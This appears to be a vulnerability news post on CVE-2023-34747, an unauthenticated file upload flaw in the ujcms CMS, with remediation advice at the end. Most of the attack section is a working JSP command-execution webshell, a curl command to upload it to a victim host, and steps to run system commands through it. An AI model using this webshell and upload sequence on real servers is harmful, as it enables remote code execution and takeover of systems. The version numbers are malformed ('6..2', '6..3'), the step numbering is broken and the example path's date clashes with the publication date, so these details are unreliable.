CVE CyberSecurity Database News

CVE-2023-34747 - How a Simple File Upload Flaw in ujcms 6..2 Lets Attackers Run Arbitrary Code

Poster -

Content management systems (CMS) make website building easy, but their complex features can introduce serious security problems. One recent case is in ujcms, a popular CMS in China. In version 6..2, there’s a nasty bug (CVE-2023-34747) that lets hackers upload any file—even malicious scripts—using a poorly protected API endpoint. In this post, we’ll break down how this flaw works, demo a simple exploit, and give practical advice for both defenders and pentesters.

What is ujcms?

ujcms is an open-source Java CMS. It's widely used for building dynamic corporate sites, portals, and blogs, focusing on easy article and media management.

The Vulnerability

In ujcms 6..2, the endpoint /api/backend/core/web-file-upload/upload is supposed to let admin users upload media. But, due to missing checks, anyone can upload any type of file. This includes dangerous files like “webshells” (malicious scripts). And because the app saves uploads in a web-accessible directory, uploaded files can run as code if they're accessed by URL.

CVE Identifier: CVE-2023-34747

How Does The Attack Work?

- The /api/backend/core/web-file-upload/upload endpoint does not properly validate file types or protect against unauthorized access.

Step-by-Step Exploit Example

Let’s say the ujcms site is hosted at http://victim.com, and it is running the vulnerable ujcms 6..2.

Suppose the server is running Tomcat (Java). You could use a basic JSP webshell, like

<%@ page import="java.io.*"%>
<%
if(request.getParameter("cmd") != null) {
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    int c;
    while((c=in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
}
%>

You can use curl to POST your webshell

curl -F "file=@shell.jsp" http://victim.com/api/backend/core/web-file-upload/upload

3. Find The Uploaded File URL

The API usually responds with the file path, for example:
/uploads/2024/06/shell.jsp
So access it:
http://victim.com/uploads/2024/06/shell.jsp

4. Execute Commands

Now you can visit:
http://victim.com/uploads/2024/06/shell.jsp?cmd=whoami
and the output will reveal the system account running the server.

Video Demonstration

For a quick walkthrough, check this similar demonstration (not specific to ujcms):
YouTube: Exploiting File Upload Vulnerabilities

References

- Official Gitee Project - ujcms
- CVE-2023-34747 at MITRE
- Exploit DB Writeup *(similar issue, for learning purposes)*
- Chinese Writeup (漏洞细节分析)

How To Fix It?

- Upgrade: The ujcms team released ujcms 6..3 to patch this bug. Update immediately.

Filetype Checking: Only allow safe types (.jpg, .png, etc)—never allow script files.

- Move Upload Directory: Store files outside the webroot, or add web server rules to block script execution.
- WAF/IPS: Use a web firewall to catch suspicious uploads.

Final Thoughts

File upload bugs are among the most dangerous web vulnerabilities. CVE-2023-34747 in ujcms 6..2 is easy to exploit, and if you are running this CMS, you need to patch NOW. Remember, never trust user input—especially when files are involved.

Stay safe!

*If you found this post useful, share it with friends and colleagues, and check out the official patch notes for further info.*

Timeline

Published on: 06/14/2023 14:15:00 UTC
Last modified on: 06/22/2023 14:20:00 UTC